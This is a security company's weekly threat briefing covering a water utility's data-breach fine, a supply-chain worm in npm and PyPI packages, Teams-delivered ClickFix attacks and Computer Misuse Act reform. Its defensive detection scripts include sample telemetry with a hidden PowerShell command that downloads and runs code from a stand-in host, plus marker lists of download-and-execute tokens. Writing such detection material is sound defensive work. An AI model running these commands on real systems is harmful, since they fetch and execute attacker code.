Weekly Cyber Briefing 15.05.2026

Weekly Cyber Update: 15 May 2026

Lessons learnt from the ICO’s fine of South Staffordshire Water; Shai-Hulud makes a comeback; Teams is targeted again; and a long-overdue reform of the Computer Misuse Act

The Cyber Threat Intelligence Briefing is a weekly round-up of the latest cybersecurity news, trends and indicators, curated by our CISO, Nick Harris. Here’s our pick of the top stories, and why you should care.


ICO fines South Staffordshire Water almost £1m over security failings

The Information Commissioner’s Office (ICO) has fined South Staffordshire Water and its parent company £963,900 following a two-year cyber-attack which led to the compromise of personal information belonging to current and former customers and employees. After a successful phishing attack in 2020, which resulted in the installation of a remote access Trojan (RAT), the threat actor went silent. They re-emerged in 2022, using a domain administrator account and the Remote Desktop Protocol (RDP) to move between 20 endpoints. The breach was only discovered when the exfiltration of 4.1TB of data set off alarms. The data of 633,887 individuals, including bank account numbers and sort codes, ended up on the dark web.

Why it matters

The case shows that the regulator is prepared to punish a poor security posture that results in a significant data breach. The water company was found to have failed on vulnerability management, patching, monitoring (logging covered just 5% of the environment) and access control policy.

Assured’s recommended action

Don’t make the same mistakes as South Staffordshire Water. Enforce least-privilege access controls, so that a single domain administrator account cannot be used for interactive RDP sessions across the estate. Deploy adequate logging and monitoring across the entire environment, not a small sample of it, and ensure alerts are acted upon. Make sure all systems are patched and supported. And conduct regular internal and external security scans.


New Shai-Hulud supply chain campaign targets developers

Researchers have spotted a new Shai-Hulud worm campaign which has already compromised hundreds of npm and PyPI packages with infostealing malware. Attributed to TeamPCP, the campaign began with the compromise of TanStack and Mistral AI packages but quickly spread to other projects including Guardrails AI, UiPath and OpenSearch. According to TanStack, the attackers chained three techniques: a risky ‘pull_request_target’ workflow (a trigger that runs pull-request code with the base repository’s privileges), GitHub Actions cache poisoning, and runtime memory extraction of an OIDC token from the GitHub Actions runner process.

Why it matters

Most organisations don’t have visibility into what open source packages they’re running, or whether they’ve been tampered with. Because the malicious versions were built and published through the projects’ own CI/CD pipelines, they carried the same SLSA provenance as legitimate releases, so provenance-based checks would not have caught them. The campaign uses the Session peer-to-peer messaging network for data exfiltration to further complicate detection and takedown efforts. The malware also writes itself into IDE hooks so that it persists even after the malicious package has been deleted, and it spreads like a worm into other projects maintained by the targeted developers. Access to developer secrets could enable attackers to hijack cloud infrastructure and gain internal network access.

Assured’s recommended action

Audit internal projects for compromised TanStack, Mistral AI, Guardrails AI, UiPath, Bitwarden CLI and OpenSearch versions. Verify lockfiles against the integrity hashes you expect, and review CI/CD pipeline permissions, in particular workflows triggered on ‘pull_request_target’ and jobs granted OIDC tokens or secrets. Check for persistence in IDE configuration directories and quarantine impacted machines. Assume every secret reachable from an affected developer machine or pipeline (package registry tokens, cloud credentials, GitHub tokens) is compromised and rotate immediately.
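The workflow pattern described above (a ‘pull_request_target’ trigger combined with a checkout of the pull request’s head, an OIDC-capable job and a shared cache) can be flagged mechanically. The script below is an added example written for this briefing, not TanStack’s or any other project’s code: it applies stdlib-only, line-based heuristics to workflow text and returns finding codes (the codes, the regular expressions and the three sample workflows are this example’s own constructions). It also goes slightly beyond the case on the page by flagging secret references and install steps that run package lifecycle scripts.

```python
"""Flag GitHub Actions workflows exposed to the pull_request_target pattern.

Heuristic, line-based checks (stdlib only, no YAML parser) over workflow text.
The sample workflows below are constructed for this example; they are not the
TanStack, Mistral AI or any other project's real CI configuration.
"""
import glob
import re

# on:\n  pull_request_target:  |  on: [push, pull_request_target]  |  on: pull_request_target
PRT_TRIGGER = re.compile(
    r"^\s*pull_request_target\s*:|^\s*on:\s*\[[^\]]*\bpull_request_target\b|^\s*on:\s*pull_request_target\s*$",
    re.M,
)
# actions/checkout told to fetch the PR head: the untrusted code then runs with
# the base repository's token and secrets (the classic "pwn request").
HEAD_CHECKOUT = re.compile(
    r"^\s*ref:\s*\$\{\{\s*github\.(event\.pull_request\.head\.(sha|ref)|head_ref)\s*\}\}", re.M
)
ID_TOKEN_WRITE = re.compile(r"^\s*id-token:\s*write\b", re.M)   # job may mint OIDC tokens
SECRET_USE = re.compile(r"\$\{\{\s*secrets\.")                  # repository secrets exposed
CACHE_STEP = re.compile(r"^\s*-?\s*uses:\s*actions/cache@|^\s*cache:\s*['\"]?(npm|pnpm|yarn|pip)", re.M)
INSTALL_RUN = re.compile(r"^\s*-?\s*run:.*\b(npm\s+(ci|install)|pnpm\s+install|yarn\s+install|pip\s+install)\b")


def audit_workflow(text: str) -> list[str]:
    """Return finding codes for one workflow, most severe first."""
    findings: list[str] = []
    if not PRT_TRIGGER.search(text):
        return findings                 # plain pull_request runs with a read-only token
    if not HEAD_CHECKOUT.search(text):
        return ["PRT_REVIEW"]           # pull_request_target without PR-head checkout: review by hand
    findings.append("PRT_HEAD_CHECKOUT")
    if ID_TOKEN_WRITE.search(text):
        findings.append("PRT_OIDC_TOKEN")       # attacker-controlled code can request an OIDC token
    if SECRET_USE.search(text):
        findings.append("PRT_SECRETS")
    if CACHE_STEP.search(text):
        # The job runs in the base-branch context, so a cache entry it writes is
        # served to later trusted runs: the poisoning primitive.
        findings.append("PRT_CACHE_WRITE")
    for line in text.splitlines():
        if INSTALL_RUN.search(line) and "--ignore-scripts" not in line:
            findings.append("PRT_LIFECYCLE_SCRIPTS")   # PR-controlled install hooks execute
            break
    return findings


def audit_repo(repo_dir: str) -> dict[str, list[str]]:
    """Map each workflow file under .github/workflows to its non-empty findings."""
    results: dict[str, list[str]] = {}
    for path in sorted(glob.glob(f"{repo_dir}/.github/workflows/*.y*ml")):
        with open(path, encoding="utf-8") as fh:
            found = audit_workflow(fh.read())
        if found:
            results[path] = found
    return results


# Constructed samples (hypothetical, for this example only).
RISKY_WORKFLOW = """\
name: pr-checks
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  id-token: write
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/cache@v4
        with:
          path: ~/.npm
          key: npm-${{ hashFiles('**/package-lock.json') }}
      - run: npm ci && npm test
"""
SAFE_WORKFLOW = """\
name: pr-checks
on:
  pull_request:
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts && npm test
"""
LABELER_WORKFLOW = """\
name: label
on:
  pull_request_target:
permissions:
  pull-requests: write
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v5
"""

if __name__ == "__main__":
    for name, wf in [("risky", RISKY_WORKFLOW), ("safe", SAFE_WORKFLOW), ("labeler", LABELER_WORKFLOW)]:
        print(name, audit_workflow(wf))
```

Point audit_repo at a checked-out repository to sweep every workflow; anything returning PRT_HEAD_CHECKOUT should either move to the plain pull_request trigger or stop checking out the pull request’s head, and OIDC or secret access should be removed from any job that still runs untrusted code.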


Initial access broker takes minutes to access networks via Teams

An initial access broker (IAB) has been observed socially engineering victims via Microsoft Teams, in attacks that can take just five minutes to achieve full network access. ReliaQuest said the Chinese-nexus KongTuke uses ClickFix techniques to trick users into pasting PowerShell commands that deliver the ModeloRAT malware. CVE-2023-36036, an elevation-of-privilege flaw in the Windows Cloud Files Mini Filter Driver patched in November 2023, is then exploited for privilege escalation. A fake lock screen harvests the user’s credentials when they “re-authenticate”, and full domain compromise follows. The campaign has been active since at least April 2026, and KongTuke has used at least five Microsoft 365 tenants to evade detection.

Why it matters

Teams is an increasingly popular vector for social engineering of employees. It has previously been used in ClickFix attacks, in deepfake-assisted campaigns targeting open source maintainers, and in an Iranian APT campaign. Threat actors typically reach out to individuals while impersonating IT staff, and the trust that users and security teams place in Microsoft Teams improves their chances of success. By default, many Teams deployments allow external tenants to send chat requests to employees, and most SIEM rules were written for email-borne threats rather than chat-borne ones.

Assured’s recommended action

Restrict Teams external access (federation) to an allow-list of partner domains. Alert on Teams spawning PowerShell, cmd or remote management tools, and on PowerShell launched from a Run dialog with hidden-window or encoded-command arguments. Monitor for Quick Assist execution followed by outbound connections from unexpected processes. And confirm CVE-2023-36036 is patched across the estate.
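The three host-side detections recommended above can be expressed as rules over process-creation and network-connection telemetry. The script below is an added example for this briefing, not ReliaQuest’s or Microsoft’s detection content: it runs the rules over Sysmon-style events that are constructed here (the host names, paths, command lines and the TEST-NET address 203.0.113.5 are all invented), and the tool lists and ClickFix marker strings are this example’s own assumptions to be tuned against your environment.

```python
"""Three detections for the Teams-delivered ClickFix chain, run over
Sysmon-style events. The event list is constructed for this example; hosts,
paths and the 203.0.113.5 (TEST-NET) address are not real telemetry."""
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

TEAMS = {"ms-teams.exe", "teams.exe", "msteams.exe"}
# Illustrative set of shells and remote-management tools; extend from your own inventory.
SHELLS_AND_RMM = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                  "cscript.exe", "quickassist.exe", "anydesk.exe", "teamviewer.exe",
                  "screenconnect.windowsclient.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Substrings typical of pasted ClickFix one-liners; two or more in one command line fires.
CLICKFIX_MARKERS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "iex",
                    "invoke-expression", "irm ", "invoke-restmethod", "iwr ",
                    "invoke-webrequest", "frombase64string")
# Binaries that should not be the first to go outbound right after Quick Assist starts.
LOLBINS_WITH_NETWORK = {"powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe",
                        "bitsadmin.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
QUICK_ASSIST_WINDOW = timedelta(minutes=30)


def exe_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def alert(rule: str, ev: dict, **extra) -> dict:
    return {"rule": rule, "host": ev["host"], "ts": ev["ts"], "image": ev["image"], **extra}


def detect(events: list[dict]) -> list[dict]:
    """Return alerts in time order; per-host state drives the Quick Assist rule."""
    alerts, last_quick_assist = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, host = datetime.fromisoformat(ev["ts"]), ev["host"]
        if ev["type"] == "process_create":
            parent, image = exe_name(ev["parent"]), exe_name(ev["image"])
            cmd = ev.get("cmdline", "").lower()
            if parent in TEAMS and image in SHELLS_AND_RMM:
                alerts.append(alert("teams_spawned_shell_or_rmm", ev, parent=parent))
            elif parent == "explorer.exe" and image in POWERSHELL:   # Win+R paste path
                hits = [m for m in CLICKFIX_MARKERS if m in cmd]
                if len(hits) >= 2:
                    alerts.append(alert("clickfix_powershell", ev, markers=hits))
            if image == "quickassist.exe":
                last_quick_assist[host] = ts
        elif ev["type"] == "network_connect":
            started = last_quick_assist.get(host)
            if started and ts - started <= QUICK_ASSIST_WINDOW \
                    and exe_name(ev["image"]) in LOLBINS_WITH_NETWORK:
                alerts.append(alert("quickassist_then_outbound", ev, dest=ev["dest"]))
    return alerts


TEAMS_PATH = r"C:\Program Files\WindowsApps\MSTeams\ms-teams.exe"      # constructed path
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [   # constructed telemetry, not from any real incident
    # "IT support" on Teams talks the user into running a command; shell spawns under Teams.
    {"ts": "2026-05-12T09:14:02", "host": "WS-0421", "type": "process_create",
     "parent": TEAMS_PATH, "image": PS_PATH,
     "cmdline": 'powershell -w hidden -c "irm http://203.0.113.5/a | iex"'},
    # ClickFix via Win+R: explorer.exe parent, hidden window, base64 payload ("IEX" in UTF-16LE).
    {"ts": "2026-05-12T09:16:40", "host": "WS-0421", "type": "process_create",
     "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmdline": "powershell.exe -NoP -W Hidden -enc SQBFAFgA"},
    {"ts": "2026-05-12T09:20:11", "host": "WS-0421", "type": "process_create",
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\QuickAssist.exe",
     "cmdline": "QuickAssist.exe"},
    {"ts": "2026-05-12T09:23:55", "host": "WS-0421", "type": "network_connect",
     "image": PS_PATH, "dest": "203.0.113.5:443"},
    # Benign: scheduled script and browser traffic on another host.
    {"ts": "2026-05-12T10:02:00", "host": "WS-0310", "type": "process_create",
     "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ts": "2026-05-12T10:05:00", "host": "WS-0310", "type": "network_connect",
     "image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe", "dest": "198.51.100.7:443"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

On the constructed sample the first event fires the Teams-parent rule, the Win+R command fires the ClickFix rule on its hidden-window and encoded-command markers, and the PowerShell connection three minutes after Quick Assist started fires the third rule, while the scheduled script and browser traffic on the other host stay silent. In production the Quick Assist rule benefits from an exclusion for the tool’s own Microsoft endpoints and the marker list needs tuning against your admin scripts.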


Computer Misuse Act set for long-overdue overhaul

The Computer Misuse Act (CMA) 1990 is set to be updated as part of a new National Security Bill, according to an announcement in the King’s Speech on Wednesday. The CMA was written before the web existed in its current form. It provides no statutory defence for security professionals running legitimate penetration tests or responsibly disclosing vulnerabilities. The update is intended to correct that.

Why it matters

This matters for organisations that rely on responsible disclosure programmes, external red teaming, or contracted penetration testing of third-party systems.

Assured’s recommended action

Consider using the upcoming reform to argue at a board level for creating a formal vulnerability disclosure programme. Review existing pen testing and threat hunting programmes and ensure they are documented as “authorised activities” and aligned with the “public interest” defence criteria in the new law.
